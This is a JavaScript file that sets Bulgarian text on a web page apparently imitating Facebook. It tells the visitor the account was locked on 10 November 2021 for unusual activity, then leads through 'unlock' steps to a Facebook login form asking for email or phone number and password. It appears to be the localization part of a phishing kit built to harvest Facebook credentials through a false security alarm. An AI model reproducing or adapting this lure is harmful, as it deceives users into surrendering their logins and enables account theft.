var mainHeader = document.querySelector(".home-main-header .home-heading");
var mainParagraph = document.querySelector(".home-mainparagrph .home-text");
var lockedHeader = document.querySelector(".home-lockedheader .home-text1");
var lockedParagraph = document.querySelector(".home-lockedinfobox .home-container6 .home-text5");
var footerParagraph = document.querySelector(".home-main-card .home-container7 .home-text6");
var getStarted = document.querySelector(".home-main-card .home-link");
var nextHeader = document.querySelector(".home-next-card .home-unlock-header .home-text");
var fristLineHeader = document.querySelector(".home-f-line .home-text03");
var fristLineParagraph = document.querySelector(".home-f-line .home-text05 span"); 
var secoundLineHeader = document.querySelector(".home-s-line .home-text09"); 
var thirdLineHeader = document.querySelector(".home-t-line .home-text12"); 
var nextButton = document.querySelector(".home-next-buttons .home-button1");
var backButton = document.querySelector(".home-next-buttons .home-button");
var logHeading = document.querySelector(".home-log-card .dlog .home-heading");
var logAlert = document.querySelector(".home-log-card .home-alert");
var logAlert2 = document.getElementById("alert");
var userInput = document.querySelector(".home-mail");
var passInput = document.querySelector(".home-pass");
var logButton = document.querySelector(".home-submit"); 
var or = document.querySelector(".home-or");
var createButton = document.querySelector(".home-creat-new");


mainHeader.innerHTML ="Вашият акаунт е заключен";
mainParagraph.innerHTML ="Видяхме необичайна активност във вашия акаунт. Това може да означава, че някой е използвал вашия акаунт без ваше знание.";
lockedHeader.innerHTML ="Профилът е заключен на 10 ноември 2021 г";
lockedParagraph.innerHTML ="За да ви защити, вашият профил не се вижда от хората във Facebook и не можете да използвате акаунта си.";
footerParagraph.innerHTML ="Ще ви преведем през някои стъпки, за да отключите акаунта си.";
getStarted.innerHTML ="Първи стъпки";
nextHeader.innerHTML ="Как да отключите акаунта си";
fristLineHeader.innerHTML ="Потвърдете, че това е вашият акаунт";
fristLineParagraph.innerHTML ="Тъй като някой друг може да е имал достъп, трябва да потвърдим, че вие сте собственикът на този акаунт, преди да продължим по-нататък.";
secoundLineHeader.innerHTML ="Защитете данните си за вход";
thirdLineHeader.innerHTML ="Вашият акаунт ще бъде отключен";
nextButton.innerHTML ="Следващия";
backButton.innerHTML ="обратно";
logHeading.innerHTML ="Влезте във Facebook";
logAlert.innerHTML ="Първо трябва да влезете";
logAlert2.innerHTML ="Първо трябва да влезете";
userInput.setAttribute("placeholder" , "Имейл адрес или телефонен номер");
passInput.setAttribute("placeholder" , "парола");
logButton.innerHTML ="Влизам";
or.innerHTML ="или";
createButton.innerHTML ="Създаване на нов акаунт";
